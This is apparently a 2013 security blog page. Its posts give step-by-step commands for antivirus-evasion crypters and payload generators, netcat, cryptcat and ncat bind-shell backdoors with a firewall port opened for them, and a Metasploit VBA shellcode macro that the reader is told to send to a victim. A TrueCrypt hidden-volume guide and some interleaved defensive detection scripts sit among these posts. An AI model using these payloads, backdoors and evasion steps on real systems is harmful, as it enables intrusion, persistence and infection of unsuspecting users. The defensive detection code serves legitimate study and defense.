Wednesday, October 30, 2013

List of Different AV Evasion Frameworks.

Today we are going to talk about different AV evasion frameworks for Metasploit payloads and how to use them. It is very important to know which AV you have to bypass, because then we don't have to worry about being FUD (fully undetectable): a payload can bypass one specific AV while another AV cannot be bypassed using that same payload.

(1)Veil:-


Veil is a Python-based tool which creates FUD payloads, and one of the best frameworks for AV evasion. On the 15th of every month, at least one new payload module is released.

Click here for how to install and use Veil.

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion


If you are using an interface other than eth0, you have to change the avoid.sh script. For example, I am using the ppp0 interface, so open avoid.sh and replace line 150, which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }'), with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

AV-Reports-For-payload


Click here for the original author's blog.

(3)Syringe:-


wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

Antivirus-Evasion-Using-Syringe

As mentioned previously, change the interface in the script if you are not using eth0. Replace line 10, which is export interface=eth0, with export interface=ppp0.

AV-Reports-For-syringe-payload 

(4)Shellcodeexec:-


git clone https://github.com/inquisb/shellcodeexec

We are going to use the downloaded shellcodeexec in the third step on the victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

shellcodeexex-AV-report

Click here for a detailed tutorial on how to use shellcodeexec.

(5)Hyperion:-


Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate the Metasploit payload and encrypt it with the compiled crypter.

hyperion-payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

AV-report-for-hyperion-payload 

(6)Crypter.py:-


Download it from the link below.
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

crypter.py

If you get an error while running it, change the path of structure.c on line 45, save the file and run it again.

AV-report-for-crypter.py-payload
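Hyperion and crypter.py are both runtime crypters: the real payload is stored encrypted inside the output file and only decrypted in memory when the stub runs. That is also why such files stand out to a defender who is not relying on signatures: an encrypted body has a nearly uniform byte distribution, so its Shannon entropy approaches 8 bits per byte, well above ordinary code or text. The following Python is an added example written for this post, not code from Hyperion, crypter.py or any AV product; the 7.2 bits/byte threshold and the constructed sample buffers are assumptions chosen for illustration.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, close to 8.0 for
    encrypted or compressed data, typically somewhere around 4.5-6.5 for ordinary code and text."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((count / total) * math.log2(count / total) for count in Counter(data).values())


def entropy_profile(data: bytes, chunk_size: int = 1024) -> list:
    """Entropy of each fixed-size chunk, so an encrypted blob embedded in an otherwise
    ordinary file still stands out instead of being averaged away by the rest of the file."""
    return [shannon_entropy(data[i:i + chunk_size]) for i in range(0, len(data), chunk_size)]


def looks_encrypted(data: bytes, chunk_size: int = 1024,
                    threshold: float = 7.2, min_fraction: float = 0.5) -> bool:
    """Flag a buffer when at least min_fraction of its chunks reach the entropy threshold.
    The 7.2 bits/byte cut-off is an assumption made for this example; calibrate it against
    known-good binaries from your own environment before using it for alerting."""
    profile = entropy_profile(data, chunk_size)
    if not profile:
        return False
    high = sum(1 for value in profile if value >= threshold)
    return high / len(profile) >= min_fraction


def pseudo_random_bytes(length: int, seed: bytes = b"constructed-seed") -> bytes:
    """Deterministic stand-in for an encrypted payload body (a SHA-256 chain), so the
    sample input is reproducible without shipping any real binary."""
    out = bytearray()
    block = seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:length])


# Constructed inputs: repeated text standing in for an unencrypted program, and a
# pseudo-random blob standing in for the output of a runtime crypter.
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 100
ENCRYPTED_SAMPLE = pseudo_random_bytes(4096)


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("encrypted", ENCRYPTED_SAMPLE)):
        profile = entropy_profile(sample)
        print(f"{label}: overall {shannon_entropy(sample):.2f} bits/byte, "
              f"chunks {[round(v, 2) for v in profile]}, flagged={looks_encrypted(sample)}")
```

On a real file, run entropy_profile over each PE section's raw data (the pefile library can give you those) rather than over the whole file, so the small unencrypted decryption stub does not dilute the measurement; packed-but-legitimate software will also score high, so treat the result as a triage signal rather than a verdict.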

(7)Brute-force AV Evasion :-


GenPayloads.py is a script that generates lots of payloads; you then scan the folder with the specific AV, after which the binaries left in the folder are the ones that are not detected by that AV.

Click here for the original tutorial.

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-


Awesome tutorial here on finding AV signatures and then changing the specific bit which triggers the AV. It only works against signature-based antivirus.

(9)Powershell:-


Bypass AV using the SET PowerShell module via a batch file

Get a shell using PowerSploit

Deliver a PowerShell payload using a macro

(10)Get Shell Using VB script:-


Metasploit has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads.

For a detailed tutorial click here.

(11)Ghost Writing ASM :-


Using Metasm to avoid antivirus detection. First generate the Metasploit payload in raw format, then disassemble it using Metasm, which comes with Metasploit. Add anything you want, so long as you don't break the functionality of the application. After that, compile it into an EXE.

For the tutorial click here.

(12)Different Pivoting technique to bypass AV :-


The following are frameworks and modules which are mostly used after getting credentials. They are not flagged by AV the way the traditional psexec is.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion, please comment here.

ZERO-DAY A Future Threat, And How To Protect Your Data

ABSTRACT

It is known that practically all software has security flaws (programming errors that give individuals opportunities they did not previously have); many of these vulnerabilities have not yet been discovered, and hundreds are corrected every month through packages made available by the affected organizations, sometimes as new versions and updates.


The term "zero day" (zero hour or 0day) refers to the unknown nature of security breaches to companies: this attack tries to exploit vulnerabilities in computer applications that are not yet known even to the software manufacturers. Explained simply and in general terms, there are two types of "exploit", or flaws/vulnerabilities that can be used in attacks: those found by security companies and those found by hackers whose purpose is exploitation.

The issue is that some hackers choose to disclose newly discovered flaws so that the necessary corrections can be applied, and are sometimes rewarded for it with prizes. The "black hats" prefer to keep them for their own benefit in a future attack, or to share them with attackers before the software developer knows about the vulnerability.

HISTORY OF THE AES ALGORITHM

Regarding PRIVACY, it is important to know how to control the availability and exposure of your data. The AES algorithm was proposed to replace DES: NIST (the U.S. National Institute of Standards and Technology) held a competition (the selection process began in 1997 and ended in 2000 with the victory of the Rijndael algorithm, written by Joan Daemen and Vincent Rijmen) to produce an algorithm that would be called the "Advanced Encryption Standard" and meet the following specifications: a publicly defined algorithm;

a symmetric block cipher; designed so that the key size can be increased; deployable in both hardware and software; freely available. This algorithm encrypts and decrypts using a key and blocks, both of sizes 128, 192 or 256 bits.

I will cite and explain a very important open source tool: TrueCrypt (on-the-fly encryption, OTFE) for confidential files, folders and entire drives on your PC. It can create a virtual encrypted disk or encrypt a partition. The individual algorithms supported by TrueCrypt are AES, Serpent and Twofish; additionally, five different combinations of cascaded algorithms are available: AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent. It uses RIPEMD-160, SHA-512 and Whirlpool as hash functions.

SOLUTION

Due to the increasing number of 0days discovered, I will present one of the safest techniques to protect the security of your data. First we store our data on a non-volatile memory device (e.g. a USB stick or external HD: storage where, once recorded, the data is not lost when you remove the power source). We will also create a HIDDEN volume: at worst, it can happen that you are forced by somebody to reveal the password to an encrypted volume. There are situations where you cannot refuse to reveal the password, for example due to extortion. The method is to use a "HIDDEN" volume, which allows you to handle such situations without revealing the password to your true volume. We actually create two passwords: one password for the "false" volume and one for the "true" volume.

In case of extortion you can provide the "fake" password, which gives the attacker access to a volume whose contents are irrelevant.

STEP BY STEP

Choose "Create Volume".


Step1.


Select "Create an encrypted file container" then click "Next".

Step2.

Select "Hidden TrueCrypt volume" and click "Next".

Step3.

When we select this option, the wizard will first help you create a normal volume and then a TrueCrypt hidden volume within it.

Select “Normal mode” and click “Next”.

Step4.


Choose a name for the file and click "Save".

Step5.

Select the location of the outer volume to be created (the hidden volume, which will be created later, will live inside this one). Go straight on to "Next".

Step6.

Again click "Next".

Step7.

Select the type of encryption algorithm you want to use:

Step8.


Enter the volume size and click "Next".

Step9.


Choose a password; the more characters, the better. Example: p@ssword.

Step10.

Select "Format" and click it.

Step11.


Now wait for the formatting; you can move the mouse quickly to generate better randomness.

Step12.


Let's create the next volume, click "Next".

Step13.


We will continue with our hidden volume; again click "Next".

Step14.


Select the encryption mode you want to apply to your new volume.

Step15.


Enter the size of another volume.

Step16.


Choose a secure password, different from the first, with many characters, and click "Next".

Step17.


Ready! Now the volumes are made and, beyond what was expected, you have a hidden and secret volume in which to save your important data.

Step18.


Just click on "Exit".

Step19.


So let's understand how one volume was created within the other, known as the outer volume.
Let's open TrueCrypt and first open the main volume: choose FILE SELECT, and select the volume we created.

Step20.


Click to open.


Step21.


Click on "Mount".

Step22.


This screen will ask for the password; remember that you have two, one for the false volume and one for the true one.

Step23.


Choose which password to enter.

Step24.


Pay attention: the volume that opened was the "normal" one.

Step25.


You can use social engineering if you need some day.

Step26.


Click on “Dismount”.

Step27.


We will select the same item again, now to test with the other password.

Step28.

Enter the password for the hidden volume.

Step29.


Note that our hidden volume appears; note its size and type.



This article shows a technique for the case that one day you are forced to disclose information: learn how to get out of this trap.

It's also a great way to protect your company's data, and a security strategy that you should apply to rest easy about your important data.

About the Author
This is a guest post written by RAFAEL FONTES SOUZA. He is the maintainer of the "Project Backtrack Team Brazilian"; he is also a member of the "French Backtrack Team" and has made partnerships with groups from Indonesia and Algeria, prepared a collection of video lessons and made them available on the website.

He is the founder of the "Wikileaks and Intelligence, Cypherpunks". He communicates well with groups and the general public, attended college projects with a focus on business organization, and currently seeks work experience outside of Brazil.

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

Today we are going to talk about Netcat and its alternatives; I assume that all of you are familiar with Netcat. If not, read here. I also assume that you have already opened port 455 using the following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker's IP: 192.168.56.1

Victim's IP:   192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as a backdoor. After gaining access to the machine, we create "netcat" as a startup service using changes to the system registry, and then we open a port for communication. On the attacker side, just start a netcat listener. Here is a tutorial on how to create a netcat backdoor.

But if you know the method used in that tutorial, you know there are some disadvantages to using netcat.

(1)Most AVs flag netcat as a hacking tool:- I know you can use a crypter, but general behaviour-based detection by AV is still possible.

netcat-virustotal


(2)Clear-text communication (no encryption):- anyone on the same network can view your communication. Also, because the communication is clear text, a firewall or AV can pop up and block it.

netcat-capture-traffic-using-wireshark

(3)No authentication:- anyone can start a listener for our backdoor to connect back to, because there is no mechanism to verify whether the user is authorized or not.


(B)Cryptcat:-


Cryptcat is the same as netcat, but in addition it provides encryption and an authentication mechanism.

How to install cryptcat?


In the case of BackTrack: apt-get install cryptcat.

If you are on another Linux OS, you have to install it manually from source, because the version in the repository does not come with the -e option, so we cannot bind any program to it.

So download the source from here.

Unzip it, change directory and enter the following command:

make unix

To make an exe (Windows compatible) from source, use Visual Studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of the options are the same as netcat, but look at the new option -k: it provides a password for the communication.

On the victim machine, type the following command:

cryptcat -Ldp 455 -e cmd.exe

On the attacker side, set up the listener:

cryptcat 192.168.56.101 455

backdoor-using-cryptcat

Look at the following figure, where we capture the traffic using Wireshark: it's encrypted.

cryptcat-capture-traffic

You can also provide the -k option for authentication. So in the case of cryptcat we get authentication and encryption.

But it is still detected by AV.

cryptcat virustotal
Virustotal link

(C)Ncat:-


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. Ncat comes with Nmap, so on the attacker side we already have ncat installed.

To download ncat for Windows, click here.

View the man page of ncat or run ncat --help; it has many options.

For encryption and authentication you can use --ssl, --ssl-cert, --ssl-key and --ssl-verify.

On the victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt the communication using SSL and only allow the IP 192.168.56.1 to connect back. It's possible to connect back using a spoofed IP.

On the attacker side:

ncat 192.168.56.101 455 --ssl

ncat-backdoor

And it is not detected by AV.


cryptcat virustotal


So with the help of ncat, we can get around our problems: no authentication, no encryption, and being caught by AV.
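The three weaknesses listed in this post (a well-known tool on disk, a listener handing its socket to cmd.exe, and a firewall rule opened for it) are also exactly what a defender can hunt for in process-creation telemetry, and they survive the switch from netcat to cryptcat or ncat because the command-line shape stays the same. The following Python is an added example written for this post, not code from netcat, cryptcat, ncat or any monitoring product: it runs a few rules over constructed records in a "timestamp | host | image | command line" layout (an assumption standing in for a Sysmon or EDR export), and the rule names and severities are likewise my own choices.

```python
import re
from dataclasses import dataclass

# Binaries of the netcat family, matched on the image's base name without ".exe".
NETCAT_IMAGES = {"nc", "nc64", "netcat", "cryptcat", "ncat"}
NETCAT_NAME_RE = re.compile(r"\b(nc|nc64|netcat|cryptcat|ncat)(\.exe)?\b", re.IGNORECASE)

# Listener switches (nc -L -p, cryptcat -Ldp, ncat -lvp / --listen) and the switches that hand
# the connection to a program (-e cmd.exe, ncat --exec / --sh-exec). Grouped short options such
# as -Ldp are split into single letters before the lookup, so the letters are case sensitive.
LISTEN_SWITCHES = {"l", "L", "listen"}
EXEC_SWITCHES = {"e", "c", "exec", "sh-exec", "lua-exec"}


@dataclass
class Finding:
    line_no: int
    host: str
    rule: str
    severity: str
    command_line: str


def split_switches(command_line: str) -> set:
    """Collect the option switches of a command line; '-Ldp' yields {'L', 'd', 'p'}."""
    switches = set()
    for token in command_line.split():
        if token.startswith("--") and len(token) > 2:
            switches.add(token[2:].lower())
        elif token.startswith("-") and len(token) > 1 and not token[1:].isdigit():
            switches.update(token[1:])
    return switches


def image_basename(image_path: str) -> str:
    """'C:\\Windows\\Temp\\cryptcat.exe' -> 'cryptcat'."""
    name = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(image_path: str, command_line: str):
    """Return (rule, severity) for one process-creation record, or None if nothing matched."""
    name = image_basename(image_path)
    lowered = command_line.lower()
    switches = split_switches(command_line)
    if name in NETCAT_IMAGES:
        if switches & EXEC_SWITCHES:
            return "netcat_exec", "high"          # a shell bound to a socket, listening or connecting back
        if switches & LISTEN_SWITCHES:
            return "netcat_listener", "medium"    # listener without -e: staging or file transfer
        return None                               # plain client use, e.g. a port check
    if name == "netsh" and ("portopening" in lowered or "advfirewall firewall add rule" in lowered):
        return "firewall_port_opened", "medium"
    if name == "reg" and "\\currentversion\\run" in lowered:
        severity = "high" if NETCAT_NAME_RE.search(command_line) else "medium"
        return "run_key_persistence", severity
    return None


def analyze(log_lines) -> list:
    """Parse 'timestamp | host | image | command line' records and return the findings."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        fields = [field.strip() for field in line.split("|", 3)]
        if len(fields) != 4:
            continue                              # malformed record: skip it rather than abort the sweep
        _timestamp, host, image, command_line = fields
        hit = classify(image, command_line)
        if hit:
            findings.append(Finding(line_no, host, hit[0], hit[1], command_line))
    return findings


# Constructed records in the shape of a simplified process-creation export
# (timestamp | host | image | command line); not real telemetry.
SAMPLE_LOG = [
    '2013-10-24T10:02:11 | WS-07 | C:\\Windows\\System32\\netsh.exe | netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL',
    "2013-10-24T10:02:15 | WS-07 | C:\\Windows\\Temp\\cryptcat.exe | cryptcat -Ldp 455 -e cmd.exe",
    "2013-10-24T10:03:40 | WS-07 | C:\\Tools\\ncat.exe | ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1",
    '2013-10-24T10:04:02 | WS-07 | C:\\Windows\\System32\\reg.exe | reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v svc /t REG_SZ /d "C:\\Windows\\Temp\\nc.exe -Ldp 455 -e cmd.exe"',
    "2013-10-24T10:05:30 | WS-07 | C:\\Tools\\ncat.exe | ncat -zv 10.0.0.5 443",
    "2013-10-24T10:06:00 | WS-07 | C:\\Windows\\System32\\cmd.exe | cmd.exe /c dir",
]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(f"line {finding.line_no} [{finding.severity}] {finding.rule} on {finding.host}: "
              f"{finding.command_line}")
```

Matching on the command line rather than on the file hash is what makes this hold up against the crypter and renamed-binary tricks discussed above: the rules key on the listener and -e switches, the opened port and the Run key, none of which a crypter changes. The one ncat case it still cannot see is a plain client connection, which is where network-side detection of an unexpected outbound TLS session has to take over.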

Friday, October 18, 2013

Get a Shell Using Shellcode in a Macro.

We can execute shellcode directly from a macro. It's a very old method, but it's still useful, because AV doesn't trigger on it. First we will generate the VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit


Now we have generated our shellcode. Next we will create the macro.

(1)Open any Word or Excel document.

(2)Click on View and then click on Macros.

(3)Give the macro a name and create it.

(4)Remove everything from the module window and paste our generated VB code.

(5)Save it as type Word Macro-Enabled Document.


Send this file to the victim. By default in MS Office the "Disable all macros with notification" option is enabled, so whenever any document tries to execute a macro it will pop up a security warning that macros are disabled; so to execute our shellcode using the macro, the victim must click on "Enable Content".

You have to set up a listener to receive the reverse connection. If your IP is not reachable when the victim opens the document, the document will crash. So now we will set up the listener:

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we set the migrate script as the autorunscript, so that when the document is closed our shell will not die.
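The reason this old trick still works is that it needs nothing but the macro itself: the generated VBA declares a few kernel32 functions, carries the shellcode as a long numeric Array(...) literal, and hooks an auto-execute entry point such as Auto_Open so the victim's "Enable Content" click is all it takes. Those same three traits are what a defender should look for when triaging a macro-enabled document before it reaches a user. The following Python is an added example written for this post, not code from Metasploit, Microsoft Office or any scanner; it operates on the VBA source text of a module (a tool such as olevba can extract that from a document), the scoring weights and the 64-literal array threshold are my own assumptions, and both sample modules are constructed, the suspicious one carrying placeholder numbers and no injection body.

```python
import re

# Macro entry points that run without user interaction once macros are enabled.
AUTO_EXEC_RE = re.compile(
    r"\b(Auto_?Open|Auto_?Close|Auto_?Exec|Workbook_Open|Document_Open)\b", re.IGNORECASE)

# Win32 API declarations: 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ...'
DECLARE_RE = re.compile(
    r'\bDeclare\b(?:\s+PtrSafe)?\s+(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)

# APIs that together form the classic allocate / copy / start-thread shellcode runner.
INJECTION_APIS = {"virtualalloc", "virtualallocex", "rtlmovememory",
                  "writeprocessmemory", "createthread", "createremotethread"}

# Command execution through the shell or a COM object rather than through raw memory.
EXEC_RE = re.compile(r"\b(Shell\s*\(|WScript\.Shell|CreateObject\s*\()", re.IGNORECASE)

# A long numeric Array(...) literal is how generated macros carry the shellcode bytes.
ARRAY_RE = re.compile(r"\bArray\s*\((.*?)\)", re.IGNORECASE | re.DOTALL)
SHELLCODE_ARRAY_MIN = 64   # assumption: fewer literals than this is treated as ordinary data


def scan_vba(source: str) -> dict:
    """Return the indicators found in one VBA module's source text."""
    indicators = {}
    entry_points = sorted({m.group(1) for m in AUTO_EXEC_RE.finditer(source)}, key=str.lower)
    if entry_points:
        indicators["auto_exec_entry_points"] = entry_points
    apis = []
    for m in DECLARE_RE.finditer(source):
        names = {m.group(1).lower(), (m.group(3) or "").lower()}   # declared name or its Alias
        if names & INJECTION_APIS:
            apis.append(m.group(1))
    if apis:
        indicators["memory_injection_apis"] = apis
    if EXEC_RE.search(source):
        indicators["command_execution"] = True
    longest = max((len(re.findall(r"-?\d+", m.group(1))) for m in ARRAY_RE.finditer(source)),
                  default=0)
    if longest >= SHELLCODE_ARRAY_MIN:
        indicators["embedded_byte_array"] = longest
    return indicators


def verdict(indicators: dict) -> str:
    """Weighted verdict: an auto-exec entry point alone is common in legitimate workbooks, so
    it only raises the level when combined with injection APIs, a byte array or command execution."""
    score = (3 * ("memory_injection_apis" in indicators)
             + 2 * ("embedded_byte_array" in indicators)
             + 2 * ("command_execution" in indicators)
             + 1 * ("auto_exec_entry_points" in indicators))
    if score >= 5:
        return "high"
    if score >= 2:
        return "review"
    return "clean"


# Constructed samples. BENIGN_MACRO is an ordinary formatting macro. SUSPICIOUS_MACRO has the
# shape of a generated shellcode-runner module (API declarations, Auto_Open, a byte array)
# but carries only placeholder numbers and no allocate / copy / start-thread body.
BENIGN_MACRO = """
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
"""

SUSPICIOUS_MACRO = """
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal A As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal A As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal A As Long) As LongPtr

Sub Auto_Open()
    Dim Payload As Variant
    Payload = Array(""" + ", ".join(str(i % 256) for i in range(96)) + """)
    ' placeholder numbers only; the injection body is deliberately omitted
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
"""


if __name__ == "__main__":
    for label, source in (("benign", BENIGN_MACRO), ("suspicious", SUSPICIOUS_MACRO)):
        found = scan_vba(source)
        print(f"{label}: {verdict(found)} {found}")
```

The scan is deliberately structural rather than byte-signature based, so re-encoding the payload with a different encoder or renaming variables does not change the result; what would evade it is splitting the array or hiding the declarations behind string building, which is why a mail gateway should pair a check like this with the policy the post itself mentions, blocking macros in documents that arrive from outside rather than trusting the user to leave "Enable Content" alone.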